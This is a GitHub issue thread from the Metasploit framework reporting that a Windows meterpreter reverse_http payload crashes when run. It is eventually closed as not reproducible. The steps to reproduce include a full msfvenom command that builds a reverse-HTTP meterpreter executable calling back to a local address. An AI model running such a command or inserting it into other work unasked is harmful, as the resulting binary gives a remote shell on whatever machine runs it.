### ISSUE TITLE
Windows reverse http payload crash

### ISSUE THREAD

**Issue by Green-m** [rapid7/metasploit-framework#11209]
Maybe related: #11083 
## Steps to reproduce

```
./msfvenom -p windows/meterpreter/reverse_http lhost=192.168.56.1 lport=8888 -f exe -o ../met_http_192_168_56_1_8888.exe
```
Generate a exe start a handler, then run it.

## Expected behavior

It works

## Current behavior

The exe crashed.

### Metasploit version

`metasploit v5.0.0-dev-b5c4ac6af3`

### OS

Macos 13.6

**Comment by Green-m** [comment]
I am not sure if this is a bug, seems that it occurs on my computer.
I run it with wine on macos and win7 x64, both crashed, and others of payload like reverse_tcp work well.

**Comment by ccondon-r7** [comment]
@Green-m Still an issue?

**Comment by Green-m** [comment]
Not stable and not reproduce, I think closing is good.
